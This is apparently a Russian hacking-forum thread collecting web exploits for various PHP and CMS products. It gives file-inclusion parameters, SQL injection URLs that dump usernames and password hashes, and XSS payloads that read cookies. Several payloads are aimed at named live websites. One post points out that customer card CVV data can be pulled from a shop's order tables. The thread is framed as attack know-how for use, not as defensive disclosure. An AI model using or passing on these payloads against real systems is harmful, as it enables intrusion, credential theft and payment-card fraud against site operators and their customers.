![]() |
немного PHP-inj.
PHP::HTML 0.6.4 (PHP-inj) phphtml.php?htmlclass_path=[url] Media Gallery 1.4.8a (PHP-inj) mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=[file] YAAP 1.5 (PHP-inj) includes/common.php?root_path=[file] NagiosQL 2.00-P00 (PHP-inj) functions/prepend_adm.php?SETS[path][physical]=[file] |
AMGuests0.3.0
1) Локальный инклуд файлов. Требуется: register_globals = On magic_quotes = Off Код:
http://site.ru/gb/signin.php?sent=1&AMG_serverpath=FILE%00Требуется: register_globals = On Код:
http://site.ru/gb/signin.php?AMG_signin_name="><script>alert(1);</script> |
Virtual War v1.5.0 or low
XSS и SQL-INJ Цитата:
|
SQL-inj в QuickEstore
Существует возможность провести sql-инъекцию из-за недостаточной обработки входных данных в параметре CFTOKEN в скрипте insertorder.cfm.
Пример: Цитата:
Есть и cvv, но он в таблице PARAMS и есть почему-то не везде, но можно вывести его и через последние заказы. Вот всё остальное (после TABLE таблица, ниже колонки в ней): Цитата:
На счет версии не знаю, но в гугле на запрос Цитата:
P.S.: Вроде ничё не забыл :) |
Раскрытие пути в ARTEShok CMS:
Цитата:
|
SQL-инъекция в CMS Koobi
CMS Koobi v4.2 v5.8 v6.1 со страницей скачки файлов
возможно другие версии(тестировал только на этих) http://site/index.php?area=1&p=downloads&categ=-1+union+select+1,concat(email,0x3a,pass),3+from+table_name/* Наиболее вероятные зачения table_name: Код:
koobi4_userПароль - дважды хэшированный md5: md5(md5($pass)) |
Open Guestbook 0.5
Скачать можно здесь: http://sourceforge.net/project/showf...group_id=82463 1) Пассивная XSS Код:
http://localhost/header.php?title=</title><script>alert(123);</script>В скрипте process.php из-за отсутсвия фильтрации можно провести инъекцию в запросе INSERT... При добавление сообщения в поле Message вводим: Код:
','','','', '', '', '', '', '', '><script>alert(111);</script>', '', '', '')/* |
artCifra CMS v4.5
Уязвимость в cookie. Имя куки artcifraSES. Возможность проведения SQL инъекции. Пример: Изменяем содержимое куки на: Код:
')+union+select+column1,column2+from+some_table |
CONTENTdm
Пассивные XSS: 1) в скрипте results.php уязвимы переменная CISOBOX1, CISOBOX2 и т.д. кстати найдена мной 05.07.2007 а в багтраках появилась только 06.08.2007, так что если и баян, то свой, так сказать для полноты сюда запостил 2) во многих скриптах в переменной CISOROOT примеры: Код:
http://contentdm.nitle.org/cdm4/item_viewer.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3EКод:
http://mdc.cbuc.cat/cdm4/document.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3E |
A-Shop Версии: 4.4.1(возможно и более ранние) - 4.7.х(last)SQL-инъекция с доступом в user и с незашифренными пасами. Уязвимость в catalogue.php , переменная cat, фильтрации никакой нет. Колличество столбцов 33,32 или 2. Пример: Код:
http://www.the123d.com/shop/catalogue.php?cat=-21+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+user/*Отправил на video@antichat.ru должны скоро выложить. |
| Время: 06:06 |